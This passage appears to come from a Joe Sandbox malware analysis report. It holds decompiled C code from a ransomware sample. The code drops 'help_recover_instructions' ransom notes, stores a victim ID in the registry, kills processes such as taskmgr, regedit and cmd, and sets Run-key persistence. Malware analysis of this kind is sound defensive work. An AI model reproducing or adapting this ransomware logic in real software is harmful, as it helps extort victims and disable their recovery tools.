                    											} else {
                    												goto L21;
                    											}
                    										}
                    									}
                    									L23:
                    									if(_t30 != 0) {
                    										_push(_t71);
                    										_t30 = wcsstr(_t50, 0x470450);
                    										_t78 = _t77 + 8;
                    										if(_t30 == 0) {
                    											_t32 = 0x472450;
                    											_t12 =  &(_t32[0]); // 0x472452
                    											_t62 = _t12;
                    											do {
                    												_t57 =  *_t32;
                    												_t32 =  &(_t32[0]);
                    											} while (_t57 != 0);
                    											if(_t32 == _t62) {
                    												L29:
                    												if( *0x480484 != 0) {
                    													_push(0x4401f8);
                    													_push(L"help_recover_instructions");
                    													E00414320(0x1000,  &_v8200, L"%s\\%s+%s.png", _t50);
                    													_t78 = _t78 + 0x14;
                    													E004134B0( &_v8200);
                    												}
                    												_push(_t69);
                    												_push(0x4401f8);
                    												_push(L"help_recover_instructions");
                    												E00414320(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t50);
                    												_t73 = E00413480( &_v8200);
                    												_t79 = _t78 + 0x18;
                    												if(_t73 != 0xffffffff) {
                    													_t43 = 0x460b30;
                    													_t17 = _t43 + 1; // 0x460b31
                    													_t65 = _t17;
                    													do {
                    														_t61 =  *_t43;
                    														_t43 = _t43 + 1;
                    													} while (_t61 != 0);
                    													E00414340( &_v8204, _t73, 0x460b30, _t43 - _t65,  &_v8204);
                    													_t79 = _t79 + 0x10;
                    													CloseHandle(_t73);
                    												}
                    												_push(0x4401f8);
                    												_push(L"help_recover_instructions");
                    												_t62 = 0x1000;
                    												E00414320(0x1000,  &_v8200, L"%s\\%s+%s.html", _t50);
                    												_t74 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0);
                    												if(_t74 != 0xffffffff) {
                    													_t40 = 0x4647c0;
                    													_t21 = _t40 + 1; // 0x4647c1
                    													_t64 = _t21;
                    													do {
                    														_t60 =  *_t40;
                    														_t40 = _t40 + 1;
                    													} while (_t60 != 0);
                    													_t62 =  &_v8204;
                    													E00414340( &_v8204, _t74, 0x4647c0, _t40 - _t64,  &_v8204);
                    													_t30 = CloseHandle(_t74);
                    												}
                    												_pop(_t69);
                    											} else {
                    												_t30 = wcsstr(_t50, 0x472450);
                    												_t78 = _t78 + 8;
                    												if(_t30 == 0) {
                    													goto L29;
                    												}
                    											}
                    										}
                    										_pop(_t71);
                    									}
                    									goto L41;
                    								}
                    								asm("sbb eax, eax");
                    								asm("sbb eax, 0xffffffff");
                    								goto L23;
                    							}
                    							goto L41;
                    						}
                    						asm("sbb eax, eax");
                    						asm("sbb eax, 0xffffffff");
                    						goto L15;
                    					}
                    					L41:
                    					return E004256D3(_t30, _t50, _v8 ^ _t75, _t62, _t69, _t71);
                    				}
                    				asm("sbb eax, eax");
                    				asm("sbb eax, 0xffffffff");
                    				goto L7;
                    			}
































                    0x004134e8
                    0x004134ed
                    0x004134f4
                    0x004134f8
                    0x0041350a
                    0x00413514
                    0x0041351b
                    0x00413520
                    0x00413523
                    0x00413528
                    0x00413530
                    0x00413530
                    0x00413536
                    0x00000000
                    0x00000000
                    0x0041353b
                    0x00413552
                    0x00413552
                    0x0041353d
                    0x0041353d
                    0x00413545
                    0x00000000
                    0x00413547
                    0x00413547
                    0x0041354a
                    0x00413550
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413550
                    0x00413545
                    0x0041355b
                    0x0041355d
                    0x00413563
                    0x00413568
                    0x00413570
                    0x00413570
                    0x00413576
                    0x00000000
                    0x00000000
                    0x0041357b
                    0x00413592
                    0x00413592
                    0x0041357d
                    0x0041357d
                    0x00413585
                    0x00000000
                    0x00413587
                    0x00413587
                    0x0041358a
                    0x00413590
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413590
                    0x00413585
                    0x0041359b
                    0x0041359d
                    0x004135a3
                    0x004135a8
                    0x004135b0
                    0x004135b0
                    0x004135b6
                    0x00000000
                    0x00000000
                    0x004135bb
                    0x004135d2
                    0x004135d2
                    0x004135bd
                    0x004135bd
                    0x004135c5
                    0x00000000
                    0x004135c7
                    0x004135c7
                    0x004135ca
                    0x004135d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004135d0
                    0x004135c5
                    0x004135db
                    0x004135dd
                    0x004135e3
                    0x004135f0
                    0x004135f2
                    0x004135f7
                    0x004135fd
                    0x00413602
                    0x00413602
                    0x00413605
                    0x00413605
                    0x00413608
                    0x0041360b
                    0x00413614
                    0x00413629
                    0x00413630
                    0x00413632
                    0x00413637
                    0x0041364e
                    0x00413653
                    0x0041365c
                    0x0041365c
                    0x00413661
                    0x00413662
                    0x00413667
                    0x0041367e
                    0x00413695
                    0x00413697
                    0x0041369d
                    0x0041369f
                    0x004136a4
                    0x004136a4
                    0x004136a7
                    0x004136a7
                    0x004136a9
                    0x004136aa
                    0x004136be
                    0x004136c3
                    0x004136c7
                    0x004136c7
                    0x004136c9
                    0x004136ce
                    0x004136e0
                    0x004136e5
                    0x0041370c
                    0x00413711
                    0x00413713
                    0x00413718
                    0x00413718
                    0x00413720
                    0x00413720
                    0x00413722
                    0x00413723
                    0x00413729
                    0x00413737
                    0x00413740
                    0x00413740
                    0x00413742
                    0x00413616
                    0x0041361c
                    0x0041361e
                    0x00413623
                    0x00000000
                    0x00000000
                    0x00413623
                    0x00413614
                    0x00413743
                    0x00413743
                    0x00000000
                    0x004135dd
                    0x004135d6
                    0x004135d8
                    0x00000000
                    0x004135d8
                    0x00000000
                    0x0041359d
                    0x00413596
                    0x00413598
                    0x00000000
                    0x00413598
                    0x00413744
                    0x00413752
                    0x00413752
                    0x00413556
                    0x00413558
                    0x00000000

                    APIs
                    • _memset.LIBCMT ref: 0041351B
                    • wcsstr.NTDLL ref: 004135F0
                    • wcsstr.NTDLL ref: 0041361C
                    • CloseHandle.KERNEL32(00000000), ref: 004136C7
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 00413706
                    • CloseHandle.KERNEL32(00000000), ref: 00413740
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandlewcsstr$CreateFile_memset
                    • String ID: %s\%s+%s.html$%s\%s+%s.png$%s\%s+%s.txt$P$G$PDG$PF$help_recover_instructions$help_recover_instructions$help_recover_instructions
                    • API String ID: 462951343-2042322709
                    • Opcode ID: 9073024c6124a845a995ef6d7def1e9ade7c062f9b95042c709359cd1dc3f6b2
                    • Instruction ID: 7db934ea3d0fd8ebc52644ab37a3ef20c6a7f9294e6458d63ca7fe416887fef5
                    • Opcode Fuzzy Hash: 9073024c6124a845a995ef6d7def1e9ade7c062f9b95042c709359cd1dc3f6b2
                    • Instruction Fuzzy Hash: B3517BB160020176E7109F24CC86BE733669F64B19F5482A7E919A73C5F779EF84C26C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E00401230(void* __ebx) {
                    				signed int _v8;
                    				char _v54;
                    				char _v56;
                    				void* _v60;
                    				int _v64;
                    				int _v68;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t25;
                    				long _t29;
                    				intOrPtr _t43;
                    				intOrPtr* _t44;
                    				signed int _t94;
                    				void* _t95;
                    				void* _t96;
                    
                    				_t61 = __ebx;
                    				_t25 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t25 ^ _t94;
                    				_v60 = 0;
                    				_v64 = 8;
                    				_v56 = 0;
                    				E0042C770( &_v54, 0, 0x2e);
                    				_t93 = RegCreateKeyExW;
                    				_t96 = _t95 + 0xc;
                    				_t29 = RegCreateKeyExW(0x80000003, L"\\S-1-5-18\\Software\\xxxsys\\", 0, 0, 0, 0x20019, 0,  &_v60, 0);
                    				_t92 = RegQueryValueExW;
                    				if(_t29 != 0 || RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x43fed8,  &_v64) != 0) {
                    					RegCreateKeyExW(0x80000001, L"Software\\xxxsys\\", 0, 0, 0, 0x2001f, 0,  &_v60, 0);
                    					if(RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x43fed8,  &_v64) != 0) {
                    						_t43 =  *0x460aa8;
                    						if(_t43 == 0) {
                    							_t43 = 0x43e45c;
                    							 *0x460aa8 = 0x43e45c;
                    						}
                    						_t18 = _t43 + 4; // 0x41cb60
                    						_t44 =  *_t18;
                    						if(_t44 != 0) {
                    							 *_t44(0x43fed8, 8);
                    							_t96 = _t96 + 8;
                    						}
                    						RegSetValueExW(_v60, L"ID", 0, 3, 0x43fed8, 8);
                    						RegFlushKey(_v60);
                    					}
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					E00401CD0(0x18, 0x43fee0, L"%X%X%X%X",  *0x43fed8 & 0x000000ff);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					E00401CD0(0x18,  &_v56, L"%X%X%X%X",  *0x43fedc & 0x000000ff);
                    					E00425AA2(0x43fee0, 0x18,  &_v56);
                    					RegCloseKey(_v60);
                    					return E004256D3(0, _t61, _v8 ^ _t94,  &_v56, _t92, _t93,  *0x43fedd & 0x000000ff);
                    				} else {
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					E00401CD0(0x18, 0x43fee0, L"%X%X%X%X",  *0x43fed8 & 0x000000ff);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					E00401CD0(0x18,  &_v56, L"%X%X%X%X",  *0x43fedc & 0x000000ff);
                    					E00425AA2(0x43fee0, 0x18,  &_v56);
                    					RegCloseKey(_v60);
                    					return E004256D3(1, __ebx, _v8 ^ _t94, 0x18, RegQueryValueExW, RegCreateKeyExW,  *0x43fedd & 0x000000ff);
                    				}
                    			}


















                    0x00401230
                    0x00401236
                    0x0040123d
                    0x0040124b
                    0x00401252
                    0x00401259
                    0x0040125d
                    0x00401262
                    0x00401268
                    0x00401288
                    0x0040128a
                    0x00401292
                    0x00401370
                    0x0040138e
                    0x00401390
                    0x00401397
                    0x00401399
                    0x0040139e
                    0x0040139e
                    0x004013a3
                    0x004013a3
                    0x004013a8
                    0x004013b1
                    0x004013b3
                    0x004013b3
                    0x004013ca
                    0x004013d4
                    0x004013d4
                    0x004013ef
                    0x004013f7
                    0x004013f8
                    0x00401409
                    0x00401423
                    0x0040142b
                    0x0040143c
                    0x0040144c
                    0x00401458
                    0x0040146f
                    0x004012ba
                    0x004012cf
                    0x004012d7
                    0x004012d8
                    0x004012e9
                    0x00401303
                    0x0040130b
                    0x0040131c
                    0x0040132c
                    0x00401338
                    0x00401352
                    0x00401352

                    APIs
                    • _memset.LIBCMT ref: 0040125D
                    • RegCreateKeyExW.ADVAPI32(80000003,\S-1-5-18\Software\xxxsys\,00000000,00000000,00000000,00020019,00000000,00000000,00000000), ref: 00401288
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401338
                    • RegQueryValueExW.ADVAPI32(00000000,00439CC4,00000000,?,0043FED8,00000008), ref: 004012B0
                      • Part of subcall function 00401CD0: __strftime_l.LIBCMT ref: 00401CE2
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\xxxsys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401370
                    • RegQueryValueExW.ADVAPI32(00000000,00439D18,00000000,?,0043FED8,00000008), ref: 0040138A
                    • RegSetValueExW.ADVAPI32(00000000,00439D20,00000000,00000003,0043FED8,00000008), ref: 004013CA
                    • RegFlushKey.ADVAPI32(00000000), ref: 004013D4
                    • RegCloseKey.ADVAPI32(00000000), ref: 00401458
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Value$CloseCreateQuery$Flush__strftime_l_memset
                    • String ID: %X%X%X%X$%X%X%X%X$%X%X%X%X$%X%X%X%X$Software\xxxsys\$\S-1-5-18\Software\xxxsys\
                    • API String ID: 2863423904-2924439399
                    • Opcode ID: 57819c60c14c9d028597cadfd946e3bf5887630331c3c6c438a2d4c18a095d66
                    • Instruction ID: 91a5836e0009545f61df0b28bfa59c004fde0f0611852c5e41a4c3c5fb11829f
                    • Opcode Fuzzy Hash: 57819c60c14c9d028597cadfd946e3bf5887630331c3c6c438a2d4c18a095d66
                    • Instruction Fuzzy Hash: 9351E771B542547EE71497A5EC43FBE3BB89B48B01F10503AB540A65F2D6F89A088B6C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 63%
                    			E00420259() {
                    				void* _t22;
                    				unsigned int _t28;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t36;
                    				wchar_t* _t41;
                    				intOrPtr* _t42;
                    				wchar_t* _t44;
                    				wchar_t* _t46;
                    				wchar_t* _t47;
                    				wchar_t* _t48;
                    				void* _t49;
                    				signed int _t50;
                    				intOrPtr _t54;
                    				void* _t59;
                    				void* _t60;
                    				intOrPtr _t61;
                    				void* _t62;
                    				signed int _t63;
                    				void* _t65;
                    				void* _t68;
                    				void* _t69;
                    
                    				do {
                    					_t57 = _t63 - 0x15890;
                    					_t22 = _t63 - 0x15884;
                    					__imp__EnumProcesses(_t22, 0x9c40, _t63 - 0x15890);
                    					if(_t22 != 0) {
                    						_t28 =  *(_t63 - 0x15890) >> 2;
                    						_t50 = 0;
                    						 *(_t63 - 0x15888) = _t28;
                    						if(_t28 != 0) {
                    							do {
                    								_t61 =  *((intOrPtr*)(_t63 + _t50 * 4 - 0x15884));
                    								if(_t61 !=  *((intOrPtr*)(_t63 - 0x1588c)) && _t61 != 0) {
                    									_t31 = E00412FC0(_t57, 0, 1, 0x99a4299d);
                    									_t68 = _t65 + 0xc;
                    									_t62 =  *_t31(0x2000030, 0, _t61);
                    									if(_t62 == 0) {
                    										L16:
                    										_t33 = E00412FC0(_t57, 0, 1, 0x723eb0d5);
                    										_t65 = _t68 + 0xc;
                    										 *_t33(_t62);
                    									} else {
                    										E0042C770(_t63 - 0x2004, 0, 0x2000);
                    										_t65 = _t68 + 0xc;
                    										__imp__GetProcessImageFileNameW(_t62, _t63 - 0x2004, 0x1000);
                    										_t36 = _t63 - 0x2004;
                    										_t57 = _t36 + 2;
                    										do {
                    											_t54 =  *_t36;
                    											_t36 = _t36 + 2;
                    										} while (_t54 != 0);
                    										if(_t36 != _t57) {
                    											E00426123(_t63 - 0x2004, 0x1000);
                    											_t41 = wcsstr(_t63 - 0x2004, L"askmg");
                    											_t69 = _t65 + 0x10;
                    											if(_t41 != 0) {
                    												L15:
                    												_t42 = E00412FC0(_t57, 0, 1, 0x9e6fa842);
                    												_t68 = _t69 + 0xc;
                    												 *_t42(_t62, 0);
                    											} else {
                    												_t57 = _t63 - 0x2004;
                    												_t44 = wcsstr(_t63 - 0x2004, L"rocex");
                    												_t69 = _t69 + 8;
                    												if(_t44 != 0) {
                    													goto L15;
                    												} else {
                    													_t46 = wcsstr(_t63 - 0x2004, L"egedi");
                    													_t69 = _t69 + 8;
                    													if(_t46 != 0) {
                    														goto L15;
                    													} else {
                    														_t47 = wcsstr(_t63 - 0x2004, L"sconfi");
                    														_t69 = _t69 + 8;
                    														if(_t47 != 0) {
                    															goto L15;
                    														} else {
                    															_t57 = _t63 - 0x2004;
                    															_t48 = wcsstr(_t63 - 0x2004, L"cmd");
                    															_t68 = _t69 + 8;
                    															if(_t48 != 0) {
                    																goto L15;
                    															}
                    														}
                    													}
                    												}
                    											}
                    											goto L16;
                    										}
                    									}
                    									_t28 =  *(_t63 - 0x15888);
                    								}
                    								_t50 = _t50 + 1;
                    							} while (_t50 < _t28);
                    						}
                    						E0042C770(_t63 - 0x15884, 0, 0x13880);
                    						_t65 = _t65 + 0xc;
                    						Sleep(0xc8);
                    					}
                    				} while ( *0x46844c != 0);
                    				_pop(_t59);
                    				_pop(_t60);
                    				_pop(_t49);
                    				 *((intOrPtr*)(E00412FC0(_t57, 0, 1, 0x768aa260)))();
                    				return E004256D3(1, _t49,  *(_t63 - 4) ^ _t63, _t57, _t59, _t60, 0xffffffff);
                    			}

























                    0x00420260
                    0x00420260
                    0x0042026c
                    0x00420273
                    0x0042027b
                    0x00420287
                    0x0042028a
                    0x0042028c
                    0x00420294
                    0x004202a0
                    0x004202a0
                    0x004202ad
                    0x004202c4
                    0x004202c9
                    0x004202d6
                    0x004202da
                    0x004203b7
                    0x004203c0
                    0x004203c5
                    0x004203c9
                    0x004202e0
                    0x004202ee
                    0x004202f3
                    0x00420303
                    0x00420309
                    0x0042030f
                    0x00420312
                    0x00420312
                    0x00420315
                    0x00420318
                    0x00420321
                    0x00420333
                    0x00420344
                    0x00420346
                    0x0042034b
                    0x004203a1
                    0x004203aa
                    0x004203af
                    0x004203b5
                    0x0042034d
                    0x0042034d
                    0x00420359
                    0x0042035b
                    0x00420360
                    0x00000000
                    0x00420362
                    0x0042036e
                    0x00420370
                    0x00420375
                    0x00000000
                    0x00420377
                    0x00420383
                    0x00420385
                    0x0042038a
                    0x00000000
                    0x0042038c
                    0x0042038c
                    0x00420398
                    0x0042039a
                    0x0042039f
                    0x00000000
                    0x00000000
                    0x0042039f
                    0x0042038a
                    0x00420375
                    0x00420360
                    0x00000000
                    0x0042034b
                    0x00420321
                    0x004203cb
                    0x004203cb
                    0x004203d1
                    0x004203d2
                    0x004202a0
                    0x004203e8
                    0x004203ed
                    0x004203f5
                    0x004203f5
                    0x004203fb
                    0x00420408
                    0x00420409
                    0x0042040a
                    0x0042041e
                    0x00420432

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: wcsstr$_memset$EnumFileImageNameProcessProcessesSleep
                    • String ID: askmg$cmd$egedi$rocex$sconfi
                    • API String ID: 1446188304-3583037101
                    • Opcode ID: f1c407ff159e8a700117d7c0813d5071be27f3a1718e6d55f9e880d821de5728
                    • Instruction ID: b3e6ca3c90dc883fdd534c025afea24800ae4c21be9fa86acf268e30b0fbfea0
                    • Opcode Fuzzy Hash: f1c407ff159e8a700117d7c0813d5071be27f3a1718e6d55f9e880d821de5728
                    • Instruction Fuzzy Hash: 69410031B403246BEB24E754AD86FDE73A4DF44705F840155FE08FA182EBB49754CA69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E0041FFF0(void* __eflags) {
                    				void* _v8;
                    				void* _v12;
                    				void* _v16;
                    				char _v20;
                    				intOrPtr* _t27;
                    				intOrPtr* _t29;
                    				intOrPtr* _t32;
                    				intOrPtr* _t35;
                    				intOrPtr* _t37;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				intOrPtr* _t46;
                    				void* _t51;
                    				void* _t54;
                    				intOrPtr _t57;
                    				intOrPtr _t59;
                    
                    				_v20 = 1;
                    				RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0, 0, 0x20006, 0,  &_v8, 0);
                    				RegSetValueExW(_v8, L"EnableLinkedConnections", 0, 4,  &_v20, 4);
                    				RegFlushKey(_v8);
                    				RegCloseKey(_v8);
                    				_t27 = E00412FC0(_v8, 0, 2, 0x90a097e6);
                    				 *_t27(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0, 0, 0x20006, 0,  &_v12, 0);
                    				_t29 = 0x46a450;
                    				_t8 = _t29 + 2; // 0x46a452
                    				_t51 = _t8;
                    				do {
                    					_t57 =  *_t29;
                    					_t29 = _t29 + 2;
                    				} while (_t57 != 0);
                    				_t63 = _t29 - _t51 >> 1;
                    				_t32 = E00412FC0(_t57, 0, 2, 0x3e400fc0);
                    				_t11 = _t63 + 2; // 0x46a450
                    				 *_t32(_v12, L"gatert-12010", 0, 1, 0x46a450, (_t29 - _t51 >> 1) + _t11);
                    				RegFlushKey(_v12);
                    				_t35 = E00412FC0(_v12, 0, 2, 0xdb355534);
                    				 *_t35(_v12);
                    				_t37 = E00412FC0(_v12, 0, 2, 0x90a097e6);
                    				 *_t37(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0, 0, 0x20006, 0,  &_v16, 0);
                    				_t39 = 0x46a450;
                    				_t15 = _t39 + 2; // 0x46a452
                    				_t54 = _t15;
                    				do {
                    					_t59 =  *_t39;
                    					_t39 = _t39 + 2;
                    				} while (_t59 != 0);
                    				_t65 = _t39 - _t54 >> 1;
                    				_t42 = E00412FC0(_t59, 0, 2, 0x3e400fc0);
                    				_t18 = _t65 + 2; // 0x46a450
                    				 *_t42(_v16, L"gatert-12010", 0, 1, 0x46a450, (_t39 - _t54 >> 1) + _t18);
                    				RegFlushKey(_v16);
                    				_t46 = E00412FC0((_t39 - _t54 >> 1) + _t18, 0, 2, 0xdb355534);
                    				return  *_t46(_v16);
                    			}



















                    0x00420016
                    0x0042001d
                    0x00420036
                    0x00420046
                    0x0042004c
                    0x0042005b
                    0x00420080
                    0x00420082
                    0x00420087
                    0x00420087
                    0x00420090
                    0x00420090
                    0x00420093
                    0x00420096
                    0x004200ab
                    0x004200ad
                    0x004200b5
                    0x004200c9
                    0x004200cf
                    0x004200dd
                    0x004200e6
                    0x004200f1
                    0x00420116
                    0x00420118
                    0x0042011d
                    0x0042011d
                    0x00420120
                    0x00420120
                    0x00420123
                    0x00420126
                    0x0042013b
                    0x0042013d
                    0x00420145
                    0x00420159
                    0x0042015f
                    0x0042016d
                    0x0042017e

                    APIs
                    • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000000,00000000,00020006,00000000,0041F729,00000000,00000000,74A33620,00000000), ref: 0042001D
                    • RegSetValueExW.ADVAPI32(0041F729,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 00420036
                    • RegFlushKey.ADVAPI32(0041F729), ref: 00420046
                    • RegCloseKey.ADVAPI32(0041F729), ref: 0042004C
                    • RegFlushKey.ADVAPI32(?), ref: 004200CF
                    • RegFlushKey.ADVAPI32(?), ref: 0042015F
                    Strings
                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0042000C
                    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00420076, 0042010C
                    • gatert-12010, xrefs: 004200C3
                    • gatert-12010, xrefs: 00420153
                    • EnableLinkedConnections, xrefs: 00420030
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Flush$CloseCreateValue
                    • String ID: EnableLinkedConnections$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Run$gatert-12010$gatert-12010
                    • API String ID: 1451706473-3431533434
                    • Opcode ID: 161738bfa41ea56bcd5f46244bf984c9d286cf3c846f1356024557cdb05744d8
                    • Instruction ID: 3362476b776491872f7b0fbb4da00e220a0f73d4176ee15283fe3825042f1d3c
                    • Opcode Fuzzy Hash: 161738bfa41ea56bcd5f46244bf984c9d286cf3c846f1356024557cdb05744d8
                    • Instruction Fuzzy Hash: 2241C576B803047BE620EBD09C47FAE77749B58B08F504459F704BB1C2DAF57A1186A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _memset.LIBCMT ref: 004010E5
                    • _memset.LIBCMT ref: 004010FC
                    • _memset.LIBCMT ref: 0040110D
                      • Part of subcall function 00401CB0: __strftime_l.LIBCMT ref: 00401CC5
                    • _strcpy_s.LIBCMT ref: 00401151
                    • _strcat_s.LIBCMT ref: 00401169
                    • RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004011B7
                    • RegQueryValueExA.ADVAPI32(?,data,00000000,?,0043FF10,00000100), ref: 004011DF
                    • RegCloseKey.ADVAPI32(?), ref: 004011EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$CloseCreateQueryValue__strftime_l_strcat_s_strcpy_s
                    • String ID: S-1-5-18\$Software\%S$data
                    • API String ID: 714010904-975203091
                    • Opcode ID: 7dda3b27990d4d8410281548369a73bd25a6ac75461646f22318cc9e1a34e1df
                    • Instruction ID: dc76a17ff71e8bd2378e309a20fbe614cd44fff18883e3855bfd8d25dd6d1dfb
                    • Opcode Fuzzy Hash: 7dda3b27990d4d8410281548369a73bd25a6ac75461646f22318cc9e1a34e1df
                    • Instruction Fuzzy Hash: EF31C675B443186BEB24D750DC86FE97378AB58B00F5041DAB789BA0C1DAF42AC48F99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 45%
                    			E004014F0() {
                    				signed int _v8;
                    				char _v12;
                    				intOrPtr _v15;
                    				intOrPtr _v16;
                    				intOrPtr _v19;
                    				intOrPtr _v20;
                    				intOrPtr _v23;
                    				intOrPtr _v24;
                    				intOrPtr _v27;
                    				intOrPtr _v28;
                    				char _v31;
                    				char _v32;
                    				intOrPtr _v39;
                    				intOrPtr _v40;
                    				intOrPtr _v43;
                    				intOrPtr _v44;
                    				intOrPtr _v47;
                    				intOrPtr _v48;
                    				intOrPtr _v51;
                    				intOrPtr _v52;
                    				intOrPtr _v55;
                    				intOrPtr _v56;
                    				intOrPtr _v59;
                    				intOrPtr _v60;
                    				intOrPtr _v63;
                    				intOrPtr _v64;
                    				intOrPtr _v67;
                    				char _v68;
                    				intOrPtr _v75;
                    				intOrPtr _v79;
                    				intOrPtr _v83;
                    				intOrPtr _v87;
                    				intOrPtr _v91;
                    				intOrPtr _v95;
                    				intOrPtr _v99;
                    				intOrPtr _v103;
                    				char _v104;
                    				intOrPtr _v111;
                    				intOrPtr _v115;
                    				intOrPtr _v119;
                    				intOrPtr _v123;
                    				intOrPtr _v127;
                    				intOrPtr _v131;
                    				intOrPtr _v135;
                    				intOrPtr _v139;
                    				char _v140;
                    				intOrPtr _v191;
                    				char _v192;
                    				intOrPtr _v196;
                    				intOrPtr _v200;
                    				intOrPtr _v204;
                    				intOrPtr _v208;
                    				char _v211;
                    				char _v212;
                    				char _v283;
                    				char _v284;
                    				intOrPtr _v364;
                    				intOrPtr _v368;
                    				intOrPtr _v372;
                    				intOrPtr _v376;
                    				char _v380;
                    				char _v384;
                    				char _v388;
                    				intOrPtr _v392;
                    				char _v396;
                    				intOrPtr* _v400;
                    				intOrPtr _v404;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t135;
                    				signed char** _t141;
                    				intOrPtr* _t142;
                    				intOrPtr* _t149;
                    				signed char** _t155;
                    				signed char* _t157;
                    				signed char** _t160;
                    				signed char* _t162;
                    				void* _t164;
                    				intOrPtr* _t167;
                    				intOrPtr* _t187;
                    				intOrPtr* _t195;
                    				intOrPtr* _t196;
                    				intOrPtr* _t198;
                    				signed char** _t208;
                    				signed char _t213;
                    				signed char _t214;
                    				signed char _t216;
                    				signed char _t217;
                    				signed char** _t238;
                    				signed char** _t243;
                    				intOrPtr _t253;
                    				intOrPtr* _t257;
                    				char _t258;
                    				intOrPtr* _t259;
                    				void* _t260;
                    				intOrPtr* _t261;
                    				signed int _t264;
                    				void* _t265;
                    				void* _t270;
                    				void* _t272;
                    				void* _t273;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    
                    				_t135 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t135 ^ _t264;
                    				 *0x43fed4 = 1;
                    				_v68 = 0;
                    				_v67 = 0;
                    				_v63 = 0;
                    				_v59 = 0;
                    				_v55 = 0;
                    				_v51 = 0;
                    				_v47 = 0;
                    				_v43 = 0;
                    				_v39 = 0;
                    				_t253 = E0040BB10();
                    				_v404 = _t253;
                    				_v396 = E0040D520();
                    				_v392 = E0040D520();
                    				_t141 =  *0x43f528; // 0x0
                    				_t142 = E00419760(_t141);
                    				_t208 =  *0x43f528; // 0x0
                    				_v400 = _t142;
                    				_t257 = E00419760(_t208);
                    				_v104 = 0;
                    				_v103 = 0;
                    				_v99 = 0;
                    				_v95 = 0;
                    				_v91 = 0;
                    				_v87 = 0;
                    				_v83 = 0;
                    				_v79 = 0;
                    				_v75 = 0;
                    				_v140 = 0;
                    				_v139 = 0;
                    				_v135 = 0;
                    				_v131 = 0;
                    				_v127 = 0;
                    				_v123 = 0;
                    				_v119 = 0;
                    				_v115 = 0;
                    				_v111 = 0;
                    				_v32 = 0;
